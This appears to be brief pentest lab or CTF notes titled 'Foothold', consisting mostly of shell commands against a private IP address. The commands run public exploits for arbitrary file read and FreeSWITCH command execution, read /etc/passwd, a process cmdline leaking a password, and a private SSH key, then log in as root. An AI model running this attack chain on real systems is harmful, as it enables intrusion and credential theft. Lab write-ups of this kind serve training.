Foothold

$ searchsploit -m 49362
$ python 49362.py 192.168.184.240 -p 3000 /etc/passwd
anthony
cassie
$ python 49362.py 192.168.184.240 -p 3000 '/proc/self/cmdline'
cassie:SecondBiteTheApple330
$ smbclient '\\192.168.184.240\backup' -U '' -N
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
$ grep -rwi password
$ python 49362.py 192.168.184.240 -p 3000 '/etc/freeswitch/autoload_configs/event_socket.conf.xml' | grep -i passw
$ telnet 192.168.184.240 8021
$ python 47799.py 192.168.184.240 whoami
$ python 47799.py 192.168.184.240 "ls /home/cassie/"
$ python 49362.py 192.168.184.240 -p 3000 '/home/cassie/id_rsa'
$ chmod 600 id_cassie

After failed attempts with cassie, tried root.

$ ssh -F /dev/null -o "IdentitiesOnly=yes" [email protected] -i id_cassie
